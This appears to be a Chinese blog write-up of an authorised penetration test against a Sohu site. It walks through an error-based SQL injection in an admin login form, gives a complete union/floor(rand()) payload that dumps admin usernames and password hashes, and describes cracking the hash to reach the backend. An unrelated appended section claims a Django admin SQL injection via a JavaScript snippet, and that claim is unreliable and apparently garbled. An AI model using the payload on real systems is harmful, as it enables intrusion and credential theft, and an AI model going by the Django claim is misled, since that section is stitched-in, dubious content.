后台登陆框post注入

作者:knife

目录
0×00 踩点
0×01 寻找漏洞
0×02 利用漏洞
0×03 完结

0×00 踩点

再一次授权情况下 ,本人对骚狐 旗下某个站点发起了一次 友情的渗透

在不知道任何信息的情况下,本人先对骚狐的一些基本服务器信息做了了解

情况如下

服务器是:unix 系统

web版本:nginx/0.7.69

ip:xxx.xxx.xxx.xxx 用了反向代理

0×01 寻找漏洞

对于服务器 我暂时没有什么漏洞可以提权

web 版本 基于 nginx 早期 80sec 发过两个 解析漏洞

这里我们可以看下 当然这么大的一只狐狸怎么会干出这种傻事呢???

所以试过之后还是得出结论 木有漏洞

那么我开始找其他漏洞 发现一个后台登陆 post 提交 注入 漏洞

而且是报错的 这里我给大家发图

在用户名那里输入了 admin ‘

报错了

如图1

我们可以得出以下几个信息

表:manage

字段:manage_name 和 manage_pwd

0×02 利用漏洞

在知道web存在漏洞的情况下 我们得利用漏洞

既然可以注入

我们就开始报错注入吧 我们可以使用 火狐的 live http headers 插件 来抓包

因为登陆框限制了字符长度 虽然我们可以修改字符长度 但是有点脱了裤子放屁的味道

那么我们开始抓包 post 提交 username password

当然 password 不可为空

我们可以这样构造了。。

username=admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x7e,manage_pwd,0x7e,manage_name,count(*),0×27,0x7e) from manage limit 0,1))a from information_schema.tables group by a)b#&password=dir

以为前提 我们知道了 表 和 字段 所以咱们不用一步一步的 去注入 可以直接爆出来

其次 我进行了更深一步的注入 权限很低

如图2


我们爆出来 账号 和密码 密码由 md5 加密 我们拿去破解

这一次的渗透基本完结了
0×03 完结

在得到账号和密码之后 我们可以进入后台

如图3

 

因骚狐要求 所以我就不暴露敏感信息了

本次渗透免费 欢迎下次光顾

文章简陋 无伤大雅


首先,Django的后台管理系统是一个非常常用的功能,但在使用时需要注意安全问题。注入漏洞是一种常见的攻击方式,攻击者可以通过注入恶意代码来获取敏感数据或执行恶意操作。 以下是一个简单的Django注入漏洞复现步骤: 1. 打开Django后台管理页面并登录。 2. 在浏览器中打开开发者工具,切换到控制台。 3. 执行以下代码: ``` var xhr = new XMLHttpRequest(); xhr.open("POST", "/admin/auth/user/"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send("csrfmiddlewaretoken=" + document.getElementsByName("csrfmiddlewaretoken")[0].value + "&username=admin';--&password=123456"); ``` 这段代码发送了一个POST请求到Django后台管理页面的登录接口,并注入了一个恶意的用户名,密码则随便填写。其中,`--`是SQL语句注释符号,可以将后面的代码注释掉,以避免出现语法错误。 4. 在控制台中查看响应结果,如果响应中包含类似于`SELECT * FROM auth_user WHERE username='admin';--' AND password='...'`的SQL语句,则说明注入成功。 5. 使用注入的用户名和任意密码登录后台管理系统,攻击者就可以获取敏感数据或执行恶意操作。 需要注意的是,以上漏洞复现仅供学习和研究使用,请勿用于非法用途。在实际应用中,应该采取一系列措施来保护Django应用的安全,例如过滤用户输入、使用ORM架等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值